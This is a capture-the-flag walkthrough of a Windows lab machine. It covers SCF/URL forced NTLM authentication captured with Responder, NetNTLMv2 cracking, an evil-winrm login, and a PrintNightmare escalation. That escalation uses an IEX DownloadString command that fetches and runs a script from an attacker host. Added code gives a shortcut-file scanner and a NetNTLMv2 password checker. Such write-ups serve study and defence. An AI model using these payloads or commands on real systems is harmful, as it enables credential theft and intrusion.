└─# nmap 10.10.11.106 --min-rate=1000 -p- -Pn -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-06 04:09 EDT
Nmap scan report for loaclhost (10.10.11.106)
Host is up (0.36s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) /winrm
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 143.54 seconds
Seeing 445 open, I tried EternalBlue; nothing.
nmap --script=smb* 10.10.11.106 -p 445 -Pn
Nothing there either.
Tried port 80: there was a 401 authentication prompt. admin:admin got in.
There is a file upload that shows no visible response, and I couldn't find where the uploaded file ends up. Tried brute-forcing the timestamp, ten thousand attempts, no luck.
Scanned port 5985 and found an odd directory. Searching online for wsman: wsman is an interface of WinRM (Windows Remote Management), which can be connected to and managed remotely with evil-winrm.
[04:42:27] 403 - 312B - /%2e%2e//google.com
[04:43:25] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[04:46:54] 405 - 0B - /wsman
Blind guess: maybe a printer vulnerability. Spent many days on it.....
By this point I was pretty demoralised. Noob that I am..
Many days went by.
One day I heard a mentor share an internal-network pentesting case about spoofing a server to force NTLM authentication. Studied it properly, and it fit this attack scenario exactly:
a file upload
an SMB service
Of these attack scenarios, two are fairly simple. One is via an .SCF file: when a user opens or refreshes the directory that holds the file, the SCF is processed automatically and the link in its icon entry is resolved, forcing the victim system to attempt NTLM authentication against the attacking machine at 10.10.14.37, where Responder is listening. The file can also be placed on a shared directory; when a user opens that share, the forced authentication is triggered.
One more tool is needed: Responder. Starting it with the defaults is enough: python3 Responder.py -I tun0 -wrf
Blind testing showed it worked; on further testing, both of the following methods work.
[Shell]
Command=2
IconFile=\\10.10.14.37\favicon.ico
[Taskbar]
Command=HEHE
[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\10.10.14.37\favicon.ico
IconIndex=1
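Both files above are INI-style text that Explorer parses while simply displaying a folder, and the IconFile value is what triggers the outbound SMB authentication. The scanner below is an added example, not code from the original post: it is the check a file-share monitor or an upload handler could run to flag shortcut files whose IconFile, URL or WorkingDirectory points at a UNC host. The three samples are constructed; the first two mirror the files shown above, the third is a benign shortcut with a local icon.

```python
import re
from typing import Dict, List

# Explorer treats .scf and .url files as INI-style text: [Section] headers and key=value lines.
# When a folder containing such a file is displayed, the icon named in IconFile is fetched; a
# UNC path there makes the client authenticate to that host before the user clicks anything.
# This scanner flags those references so an upload handler or share monitor can quarantine the
# file. Added example, not code from the original post.

_SECTION_RE = re.compile(r"^\s*\[([^\]]+)\]\s*$")
_KV_RE = re.compile(r"^\s*([A-Za-z]+)\s*=\s*(.*?)\s*$")
_UNC_RE = re.compile(r"^\\\\([^\\\s]+)(?:\\|$)")   # \\host\share\... -> host
# Keys Explorer resolves while rendering the shortcut (compared lower-cased).
RISKY_KEYS = {"iconfile", "url", "workingdirectory"}


def scan_shortcut_text(text: str) -> List[Dict[str, str]]:
    """Return one finding per key whose value is a UNC path, with the target host."""
    findings: List[Dict[str, str]] = []
    section = ""
    for line in text.splitlines():
        sec = _SECTION_RE.match(line)
        if sec:
            section = sec.group(1)
            continue
        kv = _KV_RE.match(line)
        if not kv or kv.group(1).lower() not in RISKY_KEYS:
            continue
        unc = _UNC_RE.match(kv.group(2))
        if unc:
            findings.append({"section": section, "key": kv.group(1),
                             "host": unc.group(1), "value": kv.group(2)})
    return findings


def is_suspicious_upload(data: bytes) -> bool:
    """Quarantine rule for an upload: any shortcut-style UNC reference, regardless of the
    claimed file name, since a handler may rename files and Explorer only needs the text."""
    return bool(scan_shortcut_text(data.decode("utf-8", errors="replace")))


# Constructed samples. The first two mirror the two files shown in the post; the third is a
# benign shortcut whose icon comes from a local DLL.
SCF_SAMPLE = "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.37\\favicon.ico\n[Taskbar]\nCommand=HEHE\n"
URL_SAMPLE = ("[InternetShortcut]\nURL=whatever\nWorkingDirectory=whatever\n"
              "IconFile=\\\\10.10.14.37\\favicon.ico\nIconIndex=1\n")
BENIGN_URL = ("[InternetShortcut]\nURL=https://intranet.example/portal\n"
              "IconFile=C:\\Windows\\System32\\shell32.dll\nIconIndex=3\n")

if __name__ == "__main__":
    for name, sample in (("scf", SCF_SAMPLE), ("url", URL_SAMPLE), ("benign", BENIGN_URL)):
        for f in scan_shortcut_text(sample):
            print(f"{name}: [{f['section']}] {f['key']} -> UNC host {f['host']}")
        print(f"{name}: suspicious={is_suspicious_upload(sample.encode())}")
```

The rule is deliberately extension-agnostic: the upload form on this box asks for firmware files, so the file name proves nothing, and the only thing that matters for the forced authentication is the text Explorer will parse once the file lands on the share.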
Successfully captured the target server's NTLMv2 credential, as shown below:
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
\[SMB\] NTLMv2-SSP Hash : tony::DRIVER:95fe96496a0c8df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
This v2 credential can't be used for pass-the-hash, but paired with a wordlist it can be cracked to recover the user's plaintext password. The credential is saved in the logs folder and in Responder.db.
Now it can be cracked.
hashcat
└─# hashcat -h |grep NT
5500 | NetNTLMv1 / NetNTLMv1+ESS | Network Protocols
5600 | NetNTLMv2 | Network Protocols
1000 | NTLM | Operating System
So the cracking command is
hashcat -m 5600 pass.txt /usr/share/wordlists/rockyou.txt --force
TONY::DRIVER:1122334455667788:e8f3b3ecc7071c6c9c6b7e23dce15416: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:liltony
Using john
└─# john pass.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Proceeding with incremental:ASCII
liltony (tony)
1g 0:00:01:19 DONE 3/3 (2021-11-25 10:11) 0.01258g/s 1986Kp/s 1986Kc/s 1986KC/s labzter..lilthi1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
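The hashcat mode table and the john output above both name the same construction, NetNTLMv2 (MD4 + HMAC-MD5), and the hash line has the shape USER::DOMAIN:serverchallenge:NTProofStr:blob. The following is an added example, not code from the post, from Responder or from either cracking tool: it writes out the check that -m 5600 performs for every candidate, which also makes clear why a captured NetNTLMv2 exchange cannot be passed like an NT hash (the proof is keyed to this server's challenge and this client's blob, so it only ever validates for the one exchange it came from). MD4 is implemented inline because OpenSSL 3 builds often ship without it. The user, domain and password come from the post; the challenge is Responder's fixed default as shown in the hashcat output; the blob is constructed, so the resulting NTProofStr differs from the one captured on the box.

```python
import hashlib
import hmac
import struct
from typing import Iterable, Optional

# What hashcat -m 5600 / john netntlmv2 compute per candidate, written out in Python.
# Added example; not code from the post, Responder, hashcat or john.


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, inlined because hashlib.new('md4') is missing on many OpenSSL 3 systems."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1: words in order
            a = _lrot((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2: columns 0,4,8,12,1,5,...
            a = _lrot((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & 0xFFFFFFFF,
                      (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3: fixed permutation
            a = _lrot((a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. This is the reusable 'NTLM' hash (hashcat -m 1000)."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr per MS-NLMP: HMAC-MD5 keyed by the NT hash over UPPER(user)+domain, then
    HMAC-MD5 with that key over server challenge + client blob. Bound to one exchange."""
    response_key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"),
                            hashlib.md5).digest()
    return hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()


def check_candidate(hash_line: str, candidate: str) -> bool:
    """hash_line is the Responder/hashcat form USER::DOMAIN:challenge:NTProofStr:blob."""
    user, _, domain, challenge, proof, blob = hash_line.split(":", 5)
    computed = ntlmv2_proof(candidate, user, domain, bytes.fromhex(challenge), bytes.fromhex(blob))
    return hmac.compare_digest(computed, bytes.fromhex(proof))


def recover(hash_line: str, wordlist: Iterable[str]) -> Optional[str]:
    """First wordlist entry that reproduces the captured NTProofStr, or None."""
    return next((w for w in wordlist if check_candidate(hash_line, w)), None)


def make_capture(user: str, domain: str, password: str, challenge_hex: str, blob_hex: str) -> str:
    """Build a hash line in the layout Responder writes, for the constructed sample below."""
    proof = ntlmv2_proof(password, user, domain, bytes.fromhex(challenge_hex), bytes.fromhex(blob_hex))
    return f"{user}::{domain}:{challenge_hex}:{proof.hex()}:{blob_hex}"


# Constructed sample: user/domain/password from the post, challenge is Responder's fixed default
# (also visible in the hashcat output), blob is a constructed, abbreviated NTLMv2 client blob.
BLOB_HEX = "0101000000000000" + "00d0ab1c5b5fd701" + "a1b2c3d4e5f60708" + "00000000" + "0000000000000000"
SAMPLE_LINE = make_capture("TONY", "DRIVER", "liltony", "1122334455667788", BLOB_HEX)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("recovered:", recover(SAMPLE_LINE, ["123456", "password", "liltony"]))
```

Because the proof depends on the server challenge, a defender who sees a fixed challenge such as 1122334455667788 across many captured authentications is looking at a rogue listener, and a credential recovered this way is only as weak as the password itself: the fix is the password and the forced-authentication path, not the hash.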
Log in with evil-winrm:
evil-winrm -i 10.10.11.106 -u tony -p liltony
*Evil-WinRM* PS C:\Users\tony\Documents> whoami
driver\tony
Found user.txt on the desktop.
*Evil-WinRM* PS C:\Users\tony\Desktop> dir
Directory: C:\Users\tony\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/25/2021 4:33 AM 34 user.txt
*Evil-WinRM* PS C:\Users\tony\Desktop> cat user.txt
714601e46470d5dabda05f09b8bc0e5c
*Evil-WinRM* PS C:\Users\tony\Desktop> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
tony
The command completed with one or more errors.
Tried a few commands and found that this isn't cmd.exe but PowerShell.
*Evil-WinRM* PS C:\Users\tony\Desktop> $PSVersionTable.PSVersion
Major Minor Build Revision
----- ----- ----- --------
5 0 10240 17146
The version is 5, so this server build is fairly recent; almost the same as my own server.
Earlier, during the web phase, I had guessed at a printer vulnerability. Searching turned up a recently disclosed printer vulnerability, CVE-2021-1675, whose exploitation requires that the printer service be running.
Enumerating from PowerShell showed this service is present here too.
There are many privilege-escalation scripts for it on GitHub: Python, exe and PowerShell versions.
The current situation suits the PowerShell exploit: https://github.com/calebstewart/CVE-2021-1675
Start an HTTP server with Python on the Kali desktop.
python3 -m http.server 80
Load the script remotely:
IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.37/CVE-2021-1675.ps1")
Invoke-Nightmare -DriverName "DRIVER" -NewUser "carnival" -NewPassword "carnival.com"
runas /user:carnival powershell.exe
It turned out this couldn't be executed...
Connect with the newly added administrator account.
evil-winrm -i 10.10.11.106 -u carnival -p carnival.com
Check administrator privileges:
A senior pointed out that the upload point keeps reading the uploaded files!!!
Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon.
# My English isn't good enough to translate this. Tears were shed.